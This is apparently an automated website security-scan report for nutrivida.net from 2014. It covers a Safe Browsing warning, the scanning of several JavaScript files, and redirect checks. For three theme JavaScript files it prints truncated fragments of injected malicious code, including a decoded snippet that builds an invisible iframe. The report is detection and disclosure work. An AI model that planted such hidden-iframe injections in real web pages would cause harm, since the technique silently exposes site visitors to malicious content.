Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nutrivida.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nutrivida.net/ | 200 OK Content-Length: 24799 Content-Type: text/html | clean |
http://nutrivida.net/includes/templates/theme523/jscript/jscript_jquery-1.4.min.js | 200 OK Content-Length: 77280 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function oa(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(oa,1);return}c.ready()}}function La(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function $(a,b,d,f,e,i){var j=a.length;if(typeof b==="object"){for(var o in b)$(a,o,b[o],f,e,d);return a}if(d!==w){f=!i&&f&&c.isFunction(d);for(o=0;o<j;o++)e(a[o],b,f?d.call(a[o] if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://nutrivida.net/includes/templates/theme523/jscript/jscript_xdarkbox.js | 200 OK Content-Length: 9591 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('#productMainImage a').click(function() { var link = $(this); if(!$('div.darkbox-frame').length) { darkbox = $('<div class="darkbox-frame"><div class="darkbox-shadow"></div><div class="darkbox-canvas"><div class="darkbox-button"></div></div></div>').appendTo('body'); } var frame = darkbox.clone().appendTo('body').addClass('darkbox-frame-on'); va if(f)e(s);} Antivirus reports:
| ||
http://nutrivida.net/includes/templates/theme523/jscript/jscript_zjquery.faded.js | 200 OK Content-Length: 13640 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof jQuery != "undefined") { jQuery(function($) { $.fn.extend({ faded: function(options) { var settings = $.extend({}, $.fn.faded.defaults, options); return this.each( function() { if($.fn.jquery < "1.3.1") {return;} var $t = $(this); var $c = $t.children(":nth-child(1)"); var o = $.metadata ? $.extend({}, settings, $t.metadata()) : settings; var total = $c.children().size(); var next if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://nutrivida.net/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nutrivida.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 09:05:27 GMT
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: zenid=vs95fko70na4it6oquc1fd7v63; path=/; domain=.www.nutrivida.net
X-Powered-By: PHP/5.3.18
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: nutrivida.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 09:05:27 GMT
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: zenid=vs95fko70na4it6oquc1fd7v63; path=/; domain=.www.nutrivida.net
X-Powered-By: PHP/5.3.18
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: nutrivida.net
Referer: http://www.google.com/search?q=nutrivida.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nutrivida.net
Referer: http://www.google.com/search?q=nutrivida.net
Result:
The result is similar to the first query. There are no suspicious redirects found.